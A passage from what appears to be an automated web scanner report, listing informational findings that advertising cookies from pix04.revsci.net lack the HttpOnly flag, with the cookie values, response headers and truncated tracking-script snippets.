rtc_0=MLsvsdUvcS5nJgFEV8O6cA+ssydxFuQPjAyWrSbmZ3Xbl2Rd84FlLVUeISQkZPpq3+/yS+PtxMQT7DslgE+EiBPc1PKM2t+/EOpB4uLrf6GOWya56Dc3gwsoLE781CimXk//GxJynTvaxdqPo1TcXMqyUtwfAzZ2jEbLM1yrYRos7UmLXPcfXiav1mZjU936ZROamqN/fqWS2Q8yar3w1E6Mfwg1R0eyXhh40tZ4iA4m0+aATuP7UocbTVUX5CteZOewKvL7JQQ5iXH7fo8MQylSc1kX/hS/g/6bpKvFkJnlV1iuL3q3JzvhB63Bg7LVssbJt+9XzCTI6mQ2/Y6Is6AG6Ik9cGuVmbjBM+7LXLoebV5kaXjFu+yaDGqJ7tVTKsz3xzzEwV//3BfuqMZMpvXSVZESCesOKM8lj7vQGCuI2IJGrayPJ4SRCJ0=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.351. http://pix04.revsci.net/F08747/b3/0/3/1003161/102504215.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/102504215.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCF+BTCGI0VkQ0a9c=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:23 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64ab&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:23 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.352. http://pix04.revsci.net/F08747/b3/0/3/1003161/1084292.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/1084292.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9iATaSM0VkT/a+o=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:25 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b5&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:25 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9iATaSM0VkT/a+o=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:25 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b5&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:25 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:25 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.353. http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/114261376.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl+CTSaM1VkRla8I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:03 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6497&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:03 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl+CTSaM1VkRla8I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:03 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6497&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:03 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:02 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.354. http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/114261376.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFekOFbwIUllNab/ceIeEilLVS2kCFjA3BhmBr0r4Qw7fcgurNlqCxKr7OS2Tzwu4/ImKENwACIeUxtxcyhInsW62RvwGttnnTlJdYuG2GMjvmS59xXtW1zcuSNlc6JwL1GC7GLjiagol5wqEfMqEmOXK1+jgPWikvKbfp5MJUU26T53ypH7uwS0nrW8LWKahz0T+cVnt6U+31FQrmtV52AGhTso37wf4V3DagBiioHhz/gif2Y9om2so6WTwDBsQDDb/eZmeqXltfcS1Un7ciBY4U4KA0; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/
NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:48 GMT; Path=/
rtc_0=MLsvsNUvcS5nJgFEV8O6cA+G4idxFuQPjAyWrSbmZ3Tbl2Rd84FlLVUcISRc/FsFPa8heywhNNg5oFbPl3F4dMO1sqcRu9XvUH6T+X2ToNJcKBHEUablLssaqzXvV0sN4iDF0eGzgINZcw0zRL+mPOkQo5u7ZqcIkcvVGKIHC87XbFyPcMgOVI28QjWTCBD7gxqlIHS30QpvQ23aySIZt5ZxD55Z2c2GGfqWfBB6nr8wTvbeVNSkATrp9p3laMToYhkfC7XcQCg1sRH6YdvSsYEoFIsVF5hdhhIgDfYapTcthUYv2wg5i1ihR2cqliV1Zn67wjWxNJuVi6joDXBNdhcMPCFqKzLLKTl4ZuhIeYoc9iXeucply5kFJgfG2imXDzFbc7uGwNb8HtbLXtXcaj5yx988Z002RRxTALk7uCob6xDvhIj76C4h3+AECWUFcJU3nGjKAPJQ; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.355. http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/118073152.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30zv0tYD6wb/nfBD4w==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:05 GMT; Path=/
NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:05 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30zv0tYD6wb/nfBD4w==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:05 GMT; Path=/
Set-Cookie: NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:05 GMT; Path=/
X-Proc-ms: 14
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 645
Date: Wed, 02 Feb 2011 15:13:04 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3}$)/,'$1');
rsiDom=rsiDom.
...[SNIP]...

12.356. http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/118073152.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk/cnfwRV+8er9duzVms/EZMc; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:50 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e648a&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:50 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk/cnfwRV+8er9duzVms/EZMc; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:50 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e648a&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:50 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:50 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.357. http://pix04.revsci.net/F08747/b3/0/3/1003161/123757995.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/123757995.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LClyETCWI0VkREa9s=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:15 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a3&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LClyETCWI0VkREa9s=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:15 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a3&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:15 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:14 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.358. http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/128688612.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbUkvQSU+Mer9duzVms+/pMu; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:21 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b1&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:21 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbUkvQSU+Mer9duzVms+/pMu; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:21 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b1&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:21 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:21 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.359. http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/128688612.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXQnvsTX+8er9duzVms/8JMd; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:24:32 GMT; Path=/
rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJaeL+0OcrqWduR+Mlrw==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:24:32 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.360. http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/129048156.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV2CTCeM1VkRza8Y=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:41 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6481&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:41 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV2CTCeM1VkRza8Y=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:41 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6481&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:41 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:40 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.361. http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/129048156.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV+CzSWI1VkRWa9k=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:43 GMT; Path=/
NETID01=TUl6gw0BEwoAAF@QVjMAAAAg; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:38:43 GMT; Path=/
udm_0=MLvv7qPvYS5npS5IdtJQSpvhPx/j4C9J+L5/VivkmlUNWmqpgTbMk8TbIk8ExbmKiz7qqx5xOqPBM6CvUdZwtsJINfZM5g518Etlm6Ja5aLTgsyS+qrSyqvVW8YHQCBmffUjH3SUMRXBwFeAhDcM+r2AyK2lxom9mprIS2A4bBa/7umm0SwnaQuLOxTCJow+agJRBjRuO5oRmPeL+dZ9+OxdT1G9Y0Sh8Y9lv7ukyZXMZwHZk9VCEs5lclPuHkivYUkXMdd2KU39wY3dCKvOCpd5BNvp2L6tIUn/1nFhL7cWx1GDxYexYvkF8UJb09nKmQRERwxcaIdllZysZdefm/b6bavCoc1LKhfkV0zt6SbZ4shn/9CShzBMGBxGQrHu0KfdvPrE52Lv7zhS5DeQ/JzqehSYGcWyLZMWEKwtUWW7ixH2qM75Jsh0VWYp12qyam6cwDfzjyeevBWB3zvgXuNYLtX71h/oZ3xz9vhaTt5eVNkh1QeNODvWt/FJq5nekH1Sv3NOG6aidjRIQ/Rux8zKtmPGqbLDM4z2+L3Jg82VAnOMPJB1bZeohQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:43 GMT; Path=/
rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:43 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.362. http://pix04.revsci.net/F08747/b3/0/3/1003161/157224151.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/157224151.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCF2BTiOM1VkRNa9U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:21 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a9&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:21 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCF2BTiOM1VkRNa9U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:21 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a9&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:21 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:20 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.363. http://pix04.revsci.net/F08747/b3/0/3/1003161/164892384.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/164892384.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbUkPwRX+Mer9duzVms/xJMa; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:20 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b0&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:20 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbUkPwRX+Mer9duzVms/xJMa; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:20 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b0&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:20 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
